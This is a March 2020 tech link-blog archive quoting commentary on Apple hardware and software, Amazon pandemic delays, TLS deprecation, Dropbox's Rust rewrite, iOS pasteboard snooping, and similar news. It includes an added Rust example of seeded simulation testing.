One of the best features of the Apple TV is its Aerial screen saver. That’s not hyperbole—Apple always makes a big deal out of the new scenes it adds to tvOS, often promoting them as a marquee feature of major tvOS updates. If you have liked these screen savers on your TV, you can get them on your Mac, thanks to the free and open-source app Aerial.

I’m not really a screen saver person, but I really like this one.

It uses a ton of disk space—unless you turn off caching, in which case it uses a ton of bandwidth. Unfortunately, Catalina sandboxing issues mean that the cache folder has to be stored on the system drive, i.e. your SSD, rather than on a hard drive that may have more free space.

Previously:

Update (2020-03-27): Tanner Bennett:

Yeah, Catalina really ruined a lot about what I loved about that screensaver. You used to be able to use the arrow keys to skip to a different one too.

Making Swift Properties Overridable Only in Debug Builds

John Sundell:

Occasionally, we might want to override certain properties in order to facilitate testing, to be able to work on a new feature, or to debug a problem.

[…]

Here’s a way to mitigate that problem, using Swift’s new property wrappers feature in combination with the DEBUG compiler flag. By creating a DebugOverridable property wrapper, we can enforce that the properties that we wish to override during testing and development are not actually overridden within any of our code that we’re shipping to production[…]

This is a neat trick, though unfortunately property wrappers don’t work with @NSManaged. What I have been doing is having my tests use underscored versions of the properties. These are declared in an extension, which is conditionally compiled only when the TEST flag is set.

I’d still like to see Swift’s access controls reworked to make testing easier. @testable import doesn’t really do the job because it only works for symbols that are already visible at the package level. So you can only use private for stuff that will never be used from tests.

Previously:

Fast

Patrick Collison (Hacker News):

Dee Hock was given 90 days to launch the BankAmericard card (which became the Visa card), starting from scratch.

[…]

Walt Disney’s conception of “The Happiest Place on Earth” was brought to life in 366 days.

[…]

Brendan Eich implemented the first prototype for JavaScript in 10 days, in May 1995. It shipped in beta in September of that year.

[…]

Work on the Xerox Alto, the first GUI-oriented computer, started in November 1972 because of a bet: “Chuck said that a futuristic computer could be done ‘in three months’ and a Xerox exec bet him a case of wine that it couldn’t be done”.

[…]

Tony Fadell was hired to create the iPod in late January 2001 […] and shipped the first production iPod to customers in November 2001, around 290 days after getting started.

[…]

Linus Torvalds started working on Git on April 3 2005. It was self-hosting 4 days later. On April 20 2005, 17 days after work commenced, Linux 2.6.12-rc3 was publicly released with Git.

But modern physical infrastructure projects take longer.

Previously:

Update (2020-03-27): Patrick Collison:

I asked Tony Fadell about the iPod timeline for my fast project page. Summary: 😯.

Amazon Prime Delivery Delays

Jason Del Rey:

During normal times, Amazon Prime deliveries typically arrive in one or two days in the US. Now, some Prime deliveries for in-stock items are showing five-day delivery promises on the lower end, but those waits are as long as a month on some items.

An Amazon spokesperson confirmed to Recode on Sunday evening that the new April 21 delivery dates are not the result of a technical bug or error; they accurately reflect Amazon’s current reality.

“To serve our customers in need while also helping to ensure the safety of our associates, we’ve changed our logistics, transportation, supply chain, purchasing, and third-party seller processes to prioritize stocking and delivering items that are a higher priority for our customers,” the spokesperson said in a statement. “This has resulted in some of our delivery promises being longer than usual.”

Update (2020-03-27): See also: Hacker News.

Brian Heater:

Amazon today confirmed that an employee in its Queens, N.Y. fulfillment center has tested positive for the novel coronavirus.

[…]

It may be the first of its kind in the facility, but it almost certainly won’t be the last. Even as companies encourage workers to stay home at the first sign of sickness for both their benefit and that of customers, many will no doubt come to work. And then there’s the matter of those who are largely asymptomatic.

Brian Fung and Sara Ashley O’Brien:

Amazon warehouses are facing a growing tide of coronavirus cases with at least 11 facilities hit so far, according to Amazon and local media reports.

[…]

Amazon has temporarily closed some sites, such as the Queens location, but has largely refrained from mass closures. The company told CNN that it is taking “extreme measures to ensure the safety of employees at our site[s].”

[…]

Amazon is witnessing spikes in demand that are comparable to the surge surrounding peak holiday periods such as Black Friday, Jay Carney, Amazon’s senior vice president of global corporate affairs, told CNN’s Poppy Harlow in an interview last week. In response, the company is ramping up hiring.

David Dayen (via Marina Epelman):

How has this filtered down to people like Tyler Hamilton, a worker at Amazon’s warehouse in Shakopee, Minnesota? He gets a couple more bucks an hour now, as Amazon raised its base pay to $17 to attract workers. And amid other complaints from Senators about hazard pay, on Sunday Amazon made overtime work double time instead of time and a half. “It helps, but to get the hazard pay you have to be there for 40 hours a week and the overtime,” said Hamilton, who has been organizing with The Awood Center, a community group that’s part of a larger grassroots coalition pressuring Amazon called Athena. “A lot of people are going to be there for longer. People will take as much OT as they can get, because we’re all poor.”

What Amazon gives with the overtime pay, then, comes at the expense of worker safety, which is nearly impossible to manage in the warehouse and delivery environments. The amount of people in warehouses and the workload makes physical distancing difficult. Amazon has put tape on the floor of Hamilton’s warehouse using a standard of maintaining a three-foot distance from co-workers, half of the recommended six-foot standard.

Josh Centers:

It’s safest and cheapest to wait at least 72 hours before handling or opening the package. While the virus dies off on cardboard in about 24 hours, it lives much longer on plastic. If the warehouse worker who packed the item or delivery person who dropped it off was infected, then there could be virus present not only on the cardboard or paper of the package, but on any plastic tape, labels, or inside the packaging.

If you choose to disinfect instead of waiting it out, use a cleaner from the EPA’s approved list.

You can use ultraviolet light to disinfect, but it’s complicated, expensive, and hard to recommend.

Josh Centers:

Today, the New York Times published an article attempting to refute mine (without mentioning my article, of course). Long story short, they’re telling people not to worry, which I think is highly irresponsible.

Monday, March 23, 2020

Chrome and Firefox Postpone Disabling TLS 1.0 and 1.1

Martin Brinkmann (via John Opdenakker, Hacker News):

Mozilla has re-enabled TLS 1.0 and 1.1 in the Firefox Stable and Beta browser; it is unclear when Mozilla did that but an update on the Firefox release notes page highlights why the protocols have been enabled again. Mozilla notes:

We reverted the change for an undetermined amount of time to better enable access to critical government sites sharing COVID19 information.

According to the update posted on the release notes page, Mozilla made the decision because some government sites still rely on the old protocols.

And the change “will be remotely applied to Firefox 74, which has already been shipped.”

Google (via Bugzilla):

Due to adjusted work schedules at this time, we are pausing upcoming Chrome and Chrome OS releases.

See also: Deprecation of Legacy TLS 1.0 and 1.1 Versions (tweet, Hacker News).

Previously:

Apple Mail’s Magic Mailboxes

Chris Hynes:

One of my proudest achievements on the team (and at Apple) was brainstorming with my team members and pushing an idea we internally called Magic Mailboxes and eventually became called Combined Mailboxes.

[…]

The 4 “combined mailboxes” (INBOX, Drafts, Sent, Trash) would get top billing, positioned at the top of the list, with unique and large icons to distinguish themselves

[…]

Clicking on any of the combined mailboxes would show the union of all the messages in all accounts

Flipping open a disclosure triangle on one of the combined mailboxes

Remember that drawer?

Previously:

Update (2020-03-27): See also: Hacker News.

Friday, March 20, 2020

Verifying Photo Locations

Kaveri:

Here’s an unexpected side effect of the pandemic - the water flowing through the canals of Venice is clear for the first time in forever. The fish are visible, the swans returned.

Eliot Higgins:

Because I’m a massive verification nerd who hates fun, here’s a little thread on geolocating these photos that people are claiming aren’t from Venice.

[…]

Now, let’s see if we can find another image, this one will be a little tougher as we’ve no bridge to help narrow down possible locations, so let’s see who can beat me to it.

[…]

So we’re looking for 3 buildings, painted orange, red, and pink in that order. Satellite imagery isn’t much use, but Google Earth has 3D buildings, which allows you to look at a larger area than Street View allows all at once.

[…]

A quick Google of “ponte dei ferali venezia” brings up plenty of images that seem similar, but how do I know this isn’t just another very similar bridge? Well, I need to find close up photographs of the brickwork and other features and match it perfectly with the original image.

See also: Bellingcat’s Online Investigation Toolkit.

Previously:

Writing Command Line Interfaces for iOS Apps

Guilherme Rambo:

There are countless ways to go about creating a better environment for debugging and iteration while working in iOS apps, such as using launch arguments, environment variables, or having an internal settings or debug menu inside the app itself where you can tweak things. I believe every shipping app should include those, since they improve the development process significantly.

But even with all of those options available, I still think there’s room for one more: a command line interface. Yes, you read it correctly: I wrote a command line interface for my iOS app.

[…]

Thus, there needs to be a way to send data back and forth between a Mac and iOS devices (or the Simulator). There’s probably some way to do it using the wired lightning connection, we could also spin up a socket or HTTP server on the device, but I decided to use the MultipeerConnectivity framework.

Previously:

What Does the “Move To” Command Do in iWork?

Howard Oakley:

First, it surprises you by not adopting the standard human interface. Instead of the normal Save File dialog, as used by countless apps for a great many years, it drops down a small sheet offering in a popup menu to move the document to where it already is. In the spirit of novelty, as if intended to exemplify bad interface design, that popup lists a strange assortment of locations, of which only a few seem remotely appropriate. If you want a properly-designed purposeful dialog, you have to click on Other… right at the bottom to see a familiar Save File dialog.

[…]

What arrives at the destination is disappointingly exactly what you’d get from a regular Finder move: all saved versions are stripped from it. So unless you like this idiosyncratic interface, there seems no advantage in using it over a standard Finder move, and if you want a copy instead, then you’ll want to use the Finder anyway, once again accepting that you’ll lose access to all versions in the process.

Previously:

Thursday, March 19, 2020

Mac mini 2020

Tim Hardwick (Hacker News, Apple):

Apple today updated the Mac mini so that standard configurations now come with double the storage capacity.

The $799 configuration now comes with 256GB of PCIe-based SSD storage, while the $1,099 configuration features 512GB of storage as standard.

It’s great to see 256 GB SSDs move through the line—maybe iMac will finally get an SSD soon—but are there no new processors to use?

Previously:

Update (2020-03-27): Brian Stucki:

Confirmed: the updated Mac mini will still identify as “Late 2018” in software, etc.

The Growth of Command Line Options

Dan Luu (tweet):

We can see that the number of command line options has dramatically increased over time; entries tend to get darker going to the right (more options) and there are no cases where entries get lighter (fewer options).

[…]

If structured data or objects were passed around, formatting could be left to a final formatting pass. But, with plain text, the formatting and the content are intermingled; because formatting can only be done by parsing the content out, it's common for commands to add formatting options for convenience.

[…]

Over time, more convenience options have been added. For example, to pick a command that originally has zero options, mv can move and create a backup (three options; two are different ways to specify a backup, one of which takes an argument and the other of which takes zero explicit arguments and reads an implicit argument from the VERSION_CONTROL environment variable; one option allows overriding the default backup suffix). mv now also has options to never overwrite and to only overwrite if the file is newer.

Wednesday, March 18, 2020

MacBook Air 2020

Joe Rossignol (Apple, Hacker News):

Apple today updated its MacBook Air lineup with faster processors and graphics, a scissor switch Magic Keyboard, a lower starting price of $999, and more.

The new MacBook Air features Intel's latest 10th-generation Core processors, including up to a 1.2GHz quad-core Core i7 with Turbo Boost speeds up to 3.8GHz, resulting in up to two times faster performance compared to the previous generation. And with Intel Iris Plus Graphics, the new MacBook Air delivers up to 80 percent faster graphics performance.

A 256 GB SSD for $999 is a big improvement.

In retrospect, I kind of wish I had waited for this instead of buying a 16-inch MacBook Pro. I love the speed and the larger display, but the oversized trackpad and the Touch Bar annoy me on a daily basis.

Previously:

Update (2020-11-27): See also:

iPad Pro 2020 and Magic Keyboard With Trackpad

Mitchel Broussard (Apple, Hacker News):

Apple today introduced a new iPad Pro with a faster A12Z Bionic chip, a new Magic Keyboard accessory with a built-in trackpad, an Ultra Wide camera, a LiDAR Scanner, and more. In Apple’s description of the new tablet, it calls it “faster and more powerful than most Windows PC laptops.”

[…]

The new LiDAR Scanner measures the distance to surrounding objects up to 5 meters away, and enables advanced experiences with augmented reality on the iPad Pro. Apple said this means that ARKit apps on the new iPad Pro will get improved motion capture and people occlusion, leading to AR experiences “never before possible.”

Lastly, Apple is adding trackpad support to iPadOS 13.4 and the new Magic Keyboard. This new accessory attaches magnetically to iPad Pro and includes a floating design that works well on both a lap or a desk. The Magic Keyboard features cantilevered hinges for smooth adjustments of the viewing angle up to 130 degrees, including a full-size keyboard with backlit keys and a scissor mechanism that delivers 1mm travel.

The cursor and trackpad support look great, though I’m not tempted at all to use this instead of a Mac.

The keyboard for the iPad Pro costs more ($349) than the regular iPad itself ($329), but there are also Logitech ones.

See also Federico Viticci (tweet), Ben Lovejoy, Craig Federighi’s demo.

Previously:

Update (2020-11-27): Markus Müller-Simhofer:

When the physical Escape key returned with the 16” MBP I was sure it would follow on iPad. Sadly it’s still missing. When stuck in a mode (e.g. accidental drag operation) it’s such a relief that you can press it and no harm is done.

See also:

Tuesday, March 17, 2020

Understanding Combine

Joseph Heck:

For anyone keeping up with #combine, @mattneub has published Understanding Combine online, first glance looks like a great tutorial with a lot of depth[…]

Previously:

Rewriting Dropbox’s Sync Engine in Rust

Sujay Jayakar:

Rewriting the sync engine was really hard, and we don’t want to blindly celebrate it, because in many environments it would have been a terrible idea. It turned out that this was an excellent idea for Dropbox but only because we were very thoughtful about how we went about this process. In particular, we’re going to share reflections on how to think about a major software rewrite and highlight the key initiatives that made this project a success, like having a very clean data model.

[…]

There were few consistency guarantees, and we’d spend hours debugging issues where something theoretically possible but “extremely unlikely” would show up in production. Changing the foundational nouns of a system is often impossible to do in small pieces, and we quickly ran out of effective incremental improvements.

[…]

Rust has been a force multiplier for our team, and betting on Rust was one of the best decisions we made. More than performance, its ergonomics and focus on correctness has helped us tame sync’s complexity. We can encode complex invariants about our system in the type system and have the compiler check them for us.

[…]

The Control thread is designed to be entirely deterministic when its inputs and scheduling decisions are fixed. We use this property to fuzz it with pseudorandom simulation testing.

[…]

We redesigned the client-server protocol to have strong consistency. The protocol guarantees the server and client have the same view of the remote filesystem before considering a mutation. Shared folders and files have globally unique identifiers, and clients never observe them in transiently duplicated or missing states. Finally, folders and files support O(1) atomic moves independent of their subtree size.

Previously:

Update (2020-03-27): Sujay Jayakar:

  1. we write almost all of our logic on a single thread, using futures to multiplex concurrent operations on a single thread. then, we make sure all of the code on that thread is deterministic with fixed inputs. there’s lots of ways code can sneak in a dependency on a global random number generator or time.

  2. have traits for the interfaces between the control thread and other threads. we also mock out external time behind a trait too.

  3. then, wrap each real component in a mock component that pauses all requests and puts them into a wait queue.

now, instead of just calling .wait on the control thread future, poll it until it blocks (i.e. returns Async::NotReady). this means that the control thread can’t make any progress until some future it’s depending on completes. then, we can look at the wait queues and pseudorandomly unpause some subset of them and then poll the control thread again. we repeat this process until the test completes.

all of these scheduling decisions are made pseudorandomly from a fixed RNG seed that’s determined at the beginning of the test run. we can also use this seed for injecting errors, generating initial conditions, and “agitating” the system by simulating other concurrent events. the best part is that once we find a failure, we’re guaranteed that we can reproduce it given its original seed.

in fact, we actually don’t even log in CI at all. we run millions of seeds every day and then if CI finds a failure, it just prints the seed and we then run it locally to debug.
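The seeded simulation loop described in the thread above, as an added example that is not Dropbox’s code: a single-threaded control state machine talks to two mocked components (a hypothetical “remote” server and “disk”) whose requests park in wait queues, and a scheduler driven only by a toy xorshift RNG decides which parked request completes next and whether it is failed on purpose. The `poll`/`NotReady` state machine stands in for the futures polling the thread mentions; the mock names, queue layout, and failure rate are assumptions for illustration.

```rust
use std::collections::VecDeque;
/// Tiny xorshift64* generator: the only randomness in the simulation, so every
/// scheduling and fault-injection decision is a pure function of the seed.
struct Rng(u64);

impl Rng {
    fn new(seed: u64) -> Rng { Rng(seed.max(1)) } // xorshift state must be nonzero
    fn next_u64(&mut self) -> u64 {
        let mut x = self.0;
        x ^= x >> 12; x ^= x << 25; x ^= x >> 27;
        self.0 = x;
        x.wrapping_mul(0x2545_F491_4F6C_DD1D)
    }
    fn below(&mut self, n: usize) -> usize { (self.next_u64() % n as u64) as usize }
}

#[derive(Clone, Copy, Debug, PartialEq)]
enum Req { Fetch(u32), Write(u32) }
#[derive(Clone, Copy, Debug, PartialEq)]
enum Resp { Fetched(u32), Written(u32), Failed(u32) }

/// Mock stand-in for a real component (server, local disk): requests park in a wait
/// queue and complete only when the scheduler unpauses them, possibly as a failure.
struct MockComponent { name: &'static str, waiting: VecDeque<Req>, ready: VecDeque<Resp> }

impl MockComponent {
    fn new(name: &'static str) -> MockComponent {
        MockComponent { name, waiting: VecDeque::new(), ready: VecDeque::new() }
    }
    /// Complete the parked request at `idx` and return a trace line for the log.
    fn unpause(&mut self, idx: usize, fail: bool) -> String {
        let req = self.waiting.remove(idx).expect("index within wait queue");
        let resp = match (req, fail) {
            (Req::Fetch(id), false) => Resp::Fetched(id),
            (Req::Write(id), false) => Resp::Written(id),
            (Req::Fetch(id), true) | (Req::Write(id), true) => Resp::Failed(id),
        };
        self.ready.push_back(resp);
        format!("{}:{:?}->{:?}", self.name, req, resp)
    }
}

#[derive(Debug, PartialEq)]
enum Poll { Ready, NotReady }

/// Single-threaded control logic, deterministic given the responses it is handed:
/// download every file, write each to disk, restart a file whenever a step fails.
struct Control { pending: Vec<u32>, done: Vec<u32>, total: usize, retries: u32 }

impl Control {
    fn new(ids: &[u32]) -> Control {
        Control { pending: ids.to_vec(), done: Vec::new(), total: ids.len(), retries: 0 }
    }
    /// One poll of the control "future": issue work, consume completions, and
    /// report NotReady when nothing can happen until some component responds.
    fn poll(&mut self, remote: &mut MockComponent, disk: &mut MockComponent) -> Poll {
        for id in self.pending.drain(..) {
            remote.waiting.push_back(Req::Fetch(id)); // all downloads run concurrently
        }
        while let Some(resp) = remote.ready.pop_front().or_else(|| disk.ready.pop_front()) {
            match resp {
                Resp::Fetched(id) => disk.waiting.push_back(Req::Write(id)),
                Resp::Written(id) => self.done.push(id),
                Resp::Failed(id) => {
                    self.retries += 1;
                    remote.waiting.push_back(Req::Fetch(id)); // start this file over
                }
            }
        }
        if self.done.len() == self.total { Poll::Ready } else { Poll::NotReady }
    }
}
struct Outcome { trace: Vec<String>, done: Vec<u32>, retries: u32 }
/// One simulated run: poll the control logic until it blocks, let the seeded RNG
/// pick which parked request completes next (and whether it fails), and repeat.
fn run_sim(seed: u64, ids: &[u32]) -> Outcome {
    let mut rng = Rng::new(seed);
    let (mut remote, mut disk) = (MockComponent::new("remote"), MockComponent::new("disk"));
    let mut control = Control::new(ids);
    let mut trace = Vec::new();
    while control.poll(&mut remote, &mut disk) == Poll::NotReady {
        let mut choices: Vec<&mut MockComponent> =
            vec![&mut remote, &mut disk].into_iter().filter(|c| !c.waiting.is_empty()).collect();
        if choices.is_empty() {
            panic!("deadlock at seed {}: blocked with nothing in flight", seed);
        }
        let pick = rng.below(choices.len());
        let comp = choices.swap_remove(pick);
        let idx = rng.below(comp.waiting.len());
        // Inject a failure on roughly one request in eight, capped so every run terminates.
        let fail = control.retries < 3 && rng.below(8) == 0;
        trace.push(comp.unpause(idx, fail));
    }
    control.done.sort_unstable();
    Outcome { trace, done: control.done, retries: control.retries }
}
```

A CI loop would call `run_sim` over many seeds and print only the seed of any run that panics or leaves `done` incomplete; re-running that one seed replays the identical trace locally.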

iOS Apps Snooping on Pasteboard Data

Talal Haj Bakry and Tommy Mysk (via MacRumors):

This article provides an investigation of some popular apps that frequently access the pasteboard without user consent. These apps range from popular games and social networking apps, to news apps of major news organizations. We found that many apps quietly read any text found in the pasteboard every time the app is opened. Text left in the pasteboard could be as simple as a shopping list, or could be something more sensitive: passwords, account numbers, etc.

[…]

The method is simple: Once we connect and pair the devices with Xcode, we can read the system log of the device. Fortunately, all pasteboard events are clearly logged.

[…]

We include any app that requests and reads the content of the system-wide pasteboard every time it’s opened, and consider it to be highly suspicious. There are games and apps that do not provide any UI that deals with text, yet they read the text content of the pasteboard every time they’re opened.

Nick Heer:

Most apps do not breach user trust in this manner, so it is surprising to see the breadth of very popular apps that are doing so in this case — many of which have no practical reason for reading pasteboard data in the first place. It’s the kind of thing that makes me wonder if they are all, perhaps, using a shared development framework or analytics bundle.

One way to resolve this may be to require consent from the user before the app can access the pasteboard. That consent can be provided in the form of the user tapping the paste button, upon which point the app is authorized.

Just because I once pasted something into an app doesn’t mean I want it to have ongoing access to read the pasteboard. Yet I don’t want to be prompted for each and every access, either. This seems like another case where it would be helpful for the system to maintain an audit log of what each app was doing.

Previously:

Microsoft Plots the End of Visual Basic

.NET Team:

We are supporting these application types to provide a good path forward for the existing VB customers who want to migrate their applications to .NET Core. This allows Visual Basic customers to take advantage of new platform features like side-by-side deployment, cross platform support, performance and new API improvements.

One of the major benefits of using Visual Basic is that the language has been stable for a very long time. The significant number of programmers using Visual Basic demonstrates that its stability and descriptive style is valued. Going forward, we do not plan to evolve Visual Basic as a language. This supports language stability and maintains compatibility between the .NET Core and .NET Framework versions of Visual Basic. Future features of .NET Core that require language changes may not be supported in Visual Basic. Due to differences in the platform, there will be some differences between Visual Basic on .NET Framework and .NET Core.

Paul Thurrott (via Hacker News):

When Microsoft released the .NET version of Visual Basic, originally called Visual Basic .NET, alongside C# at the beginning of the .NET era, the two languages were evolved together and had roughly identical feature sets. But this changed over time, with professional developers adopting C# and many fans of classic VB simply giving up on the more complex but powerful .NET versions of the environment. Today, virtually all of Microsoft’s relevant developer documentation is in C# only, with VB source code examples ever harder to find.

[…]

What this means to VB developers is that they might be able to bring their existing codebases forward to .NET Core or, soon, to .NET 5.0, which will replace both the traditional .NET and the open-source and cross-platform .NET Core when it’s released in late 2020. The issue is that not all legacy technologies will be supported going forward, so developers using WebForms, Workflow, or Windows Communication Foundation (WCF) will need to stick with classic .NET. Those applications will continue to work and be supported until the underlying Windows versions are retired; classic .NET support life cycles are tied to the Windows versions on which they were initially deployed.

Previously:

Monday, March 16, 2020

Microsoft Acquires npm

Nat Friedman (Hacker News):

I’m excited to announce that GitHub has signed an agreement to acquire npm.

[…]

For the millions of developers who use the public npm registry every day, npm will always be available and always be free.

[…]

The JavaScript ecosystem is massive and growing quickly. It needs a rock-solid registry. We will make the investments necessary to ensure that npm is fast, reliable, and scalable.

[…]

Looking further ahead, we’ll integrate GitHub and npm to improve the security of the open source software supply chain, and enable you to trace a change from a GitHub pull request to the npm package version that fixed it.

Working From Home Temporarily

Glenn Fleishman:

Suddenly asked or told to work from home—and never done so regularly before? I wrote a 55-page book last week, Take Control of Working from Home Temporarily. It’s free and now available. Packed with tips on setting up a space, setting boundaries, & much more[…]

See also: Rui Carmo, David Sparks, Upgrade.

Previously:

Update (2020-03-27): See also: John Gruber, Shawn Blanc, Justin Searls.

The Pace of macOS Updates

Jason Snell:

My friend and former Macworld colleague Rob Griffiths keeps a record of macOS releases, which is exactly the kind of thing I’d expect from the guy who created Mac OS X Hints. Prodded by Stephen Hackett, who is apparently now the official Six Colors Chart Muse, I’ve decided to use Rob’s data to take a look at how often Apple updates macOS.

In terms of total updates released during the lifespan of a major version, Mac OS X 10.4 Tiger and macOS 10.13 High Sierra share the crown with 12. However, High Sierra was only the “current” version of macOS for 385 days, while Tiger reigned for nearly three years. That means that Tiger actually was the version of macOS with the longest time between updates, at an average of one update for every 88 days of release.

I think the most important part for quality is not the number of updates but the time between major releases. Snow Leopard lasted almost 2 years.

Bill Gates Leaves Microsoft’s Board

Microsoft (via Hacker News):

Microsoft Corp. today announced that Co-Founder and Technology Advisor Bill Gates stepped down from the company’s Board of Directors to dedicate more time to his philanthropic priorities including global health, development, education, and his increasing engagement in tackling climate change. He will continue to serve as Technology Advisor to CEO Satya Nadella and other leaders in the company.

On June 27, 2008, Gates transitioned out of a day-to-day role in the company to spend more time on his work at the Bill & Melinda Gates Foundation. He served as Microsoft’s chairman of the board until February 4, 2014.

Previously:

Friday, March 13, 2020

ViDL 1.0.2

Ole Zorn (tweet):

ViDL is a free Mac app that allows you to easily download videos from YouTube and hundreds of other websites for offline viewing.

It is based on the popular youtube-dl command line tool, but much easier to use, especially with videos/playlists that require a login (like your personal “Watch Later” list).

See also: Downie.

Previously:

Update (2020-03-27): See also: Josh Centers, Softorino YouTube Converter 2.

TJ Luoma:

As promised, here’s a write-up on how I use iOS Shortcuts to save an URL to Dropbox and have Downie download a video.

Eight Major Releases Later, Sandbox File Limit Bug Remains

Gus Mueller:

The other question I always ask [at WWDC labs]: Is the kernel resource leak for bookmarks in sandboxed applications finally fixed? I’d sure like to put Retrobatch in the app store this year, but this bug means it can only process so many images before it fails and requires a reboot…

Erik Schwiebert:

I was talking to an Apple engineer recently about this problem as it affects Office, Gus. He mentioned you and Retrobatch specifically as a known case that they have yet to address. He said he would prod engineering to look at it.

Daniel Jalkut:

This is a vexing bug that has affected MarsEdit for years, as well.

Gus Mueller:

It’s also a different limit for every Mac configuration, as explained to me by Apple engineers.

Previously:

Update (2020-03-27): Michael Buckley:

The App Store version of Transmit works around this by prompting users to grant access to their entire home folder. Users have to tap a button, then we open an NSOpenPanel with setCanChooseDirectories. Users then have to correctly open their home folders.

The kernel seems smart enough to track file permissions at the highest possible level. Try to open 1000 files in a folder, you get 1000 entries in kernel memory. Open the folder first, and you only get 1 entry.

Sparkle Project Needs Help

Kornel (via Vadim Shpakovski):

I don’t have enough energy to give this project the attention it needs. I’m also mostly developing in Rust these days, so Sparkle doesn’t “scratch my itch” any more.

This project is quite important for security and health of non-walled-garden apps for macOS.

I need your help in getting Sparkle 2 out of the door.

Update (2020-03-27): Graham Miln:

I open sourced our updater. It takes a different approach to Sparkle – being based on packaged installs. Works well with sandboxing.

Update (2020-04-08): Squirrel:

Squirrel is an OS X framework focused on making application updates as safe and transparent as updates to a website.

Instead of publishing a feed of versions from which your app must select, Squirrel updates to the version your server tells it to. This allows you to intelligently update your clients based on the request you give to Squirrel. The server can remotely drive behaviors like rolling back or phased rollouts.

WWDC 2020 to Be Online-only

Apple (via Phil Schiller, Hacker News, MacRumors):

“We are delivering WWDC 2020 this June in an innovative way to millions of developers around the world, bringing the entire developer community together with a new experience,” said Phil Schiller, Apple’s senior vice president of Worldwide Marketing. “The current health situation has required that we create a new WWDC 2020 format that delivers a full program with an online keynote and sessions, offering a great learning experience for our entire developer community, all around the world. We will be sharing all of the details in the weeks ahead.”

Thursday, March 12, 2020

Is That Twitter Follower Fake?

NixIntel (via Dan Moren):

This Person Does Not Exist is a website that uses AI to generate random but realistic looking faces. It’s a great tool and has become a popular way of generating fake profiles for sock puppet accounts, but it is not without its limitations. There are a number of common flaws and features in TPDNE-generated images that mean it’s possible to spot them.

[…]

A common feature of TPDNE images is that the eyes and mouth of the person are always in exactly the same place in the picture. The eyes are always the same distance apart and centred in the same place. The mouth is always about one quarter of the way up from the bottom of the image and is also always centred. This occurs regardless of the angle of their head and can sometimes make for quite unusual looking faces.

[…]

TPDNE only creates a single image of a person, so if the person truly does not exist, we should never be able to find any image of them other than the fake one where they are staring directly at the camera.

Previously:

TLS Increasingly Exists in Three Different Worlds

Chris Siebenmann:

The first world is web TLS, which is dominated by browsers. This is the familiar world of public HTTPS, with public Certificate Authorities, requirements for certificate transparency, and so on. The browsers increasingly are calling the shots here and they’re pushing for things like short certificate lifetimes, aggressively moving away from old TLS versions, and so on.

[…]

The second is non-web public TLS, where TLS is used for protocols like IMAP, SMTP (with STARTTLS), and so on. This world still uses public CAs, but it has a lot more old clients and servers and is a lot slower to deprecate old TLS and SSL versions, move to shorter certificate lifetimes, and so on.

[…]

The third world is internal TLS, where TLS is used inside an organization or a service to encrypt connections and often to authenticate them (and sometimes it’s used between organizations).

Previously:

Oracle Responds to Java API Copyright Amicus Briefs

Ken Glueck, Oracle VP:

As we discussed in a previous post, this case is not about innovation, it is about theft. Google copied verbatim more than 11,000 lines of software code, and now attempts post hoc to change the rules in order to excuse its conduct. Any objective view of technological innovation during the pendency of this matter leads to the conclusion that strong copyright promotes innovation. The Federal Circuit decided in 2014 that Oracle’s Java copyrights were valid and enforceable and the period since 2014 has seen some of the greatest advances in technology.

[…]

Google has mastered the art of curating an atmosphere to support its views, spending well over $100 million over the past decade to create its echo-chamber. While Google’s approach is generally well understood, this case is the first time its artificial ecosystem was brought to bear at the Supreme Court, so we thought a little sunshine would help along the way.

We will admit to surprise when we saw the headline that 26 briefs were filed on Google’s behalf. Google attempted to create a narrative that tech supports Google’s position, and we already made the point that tech is clearly not supporting Google’s views.

Joshua Bloch (Hacker News):

In a corporate blog yesterday, Oracle attacked 83 computer scientists (including 13 Turing Award winners) who signed an amicus brief defending our right to reimplement APIs, on the grounds that some of us accepted research grants from Google.

This is nonsense. For example, Doug Lea—who is in no small measure responsible for Java’s success—accepted one small grant from Google fourteen years ago, and promptly doled it out to deserving undergrads who were testing java.util.concurrent. Have you no shame, Oracle?

We are not Google shills. We are scientists and engineers. Some of us laid the theoretical groundwork for the profession, some designed the computers you grew up on, and some wrote the software you use every day.

We depend on the right to reimplement each others’ APIs, and we are truly afraid that your irresponsible lawsuit may deprive us of that right, which we’ve enjoyed throughout our long careers.

[…]

Amusingly, one of the APIs Oracle is accusing Google of infringing is Java’s reimplementation of the Perl 5 regex API (@MadbotMcCloskey did the work, and I helped a bit). You can’t make this stuff up.

Previously:

How (Some) Good Corporate Engineering Blogs Are Written

Dan Luu:

On the other hand, companies compete relatively directly when recruiting, so being more compelling relative to another company has value to them; replicating the playbook Cloudflare or Segment has used with their engineering “brands” would be a significant recruiting advantage. The playbook isn’t secret: these companies broadcast their output to the world and are generally happy to talk about their blogging process.

Despite the seemingly obvious benefits of having a “good” corp eng blog, most corp eng blogs are full of stuff engineers don’t want to read. Vague, high-level fluff about how amazing everything is, content marketing, handwave-y posts about the new hotness (today, that might be using deep learning for inappropriate applications; ten years ago, that might have been using “big data” for inappropriate applications), etc.

To try to understand what companies with good corporate engineering blogs have in common, I interviewed folks at three different companies that have compelling corporate engineering blogs (Cloudflare, Heap, and Segment) as well as folks at three different companies that have lame corporate engineering blogs (which I’m not going to name).

Wednesday, March 11, 2020

Awesome macOS Command Line

Marcel Bischoff (via Isle of the Kakapo):

A curated list of shell commands and tools specific to OS X.

“You don’t have to know everything. You simply need to know where to find it when necessary.” (John Brunner)

Previously:

Update (2020-03-12): Matt Reagan:

You might also check out Bash Snippets… It’s a short, curated list of macOS command-line tips and commands I’ve found useful in the past.

Update (2020-04-17): See also: Apple’s list of Keyboard shortcuts in Terminal on Mac (via Marnin).

Update (2022-12-14): See also: Hacker News.

Reverting From Apple News Format to RSS

Federico Viticci:

If you use News, our @macstoriesnet channel is back to being a standard RSS one. Performance of the Apple News Format plugin for WordPress was horrible and not worth our time improving it. Luckily, News Support reverted us to the old system quickly.

Wow, I didn’t think reverting was even possible. The WordPress plug-in has been working OK for me, but it probably wasn’t worth all the effort to set it up and customize it. I had heard that using Apple News Format would cause the app to drive more traffic to my articles, but nearly two years later the analytics show that almost no one is finding my posts via Apple News. Twitter, RSS, searches, and random links from the Web are all far more effective.

Previously:

Explaining Copyright Broke the YouTube Copyright System

NYU (via Hacker News):

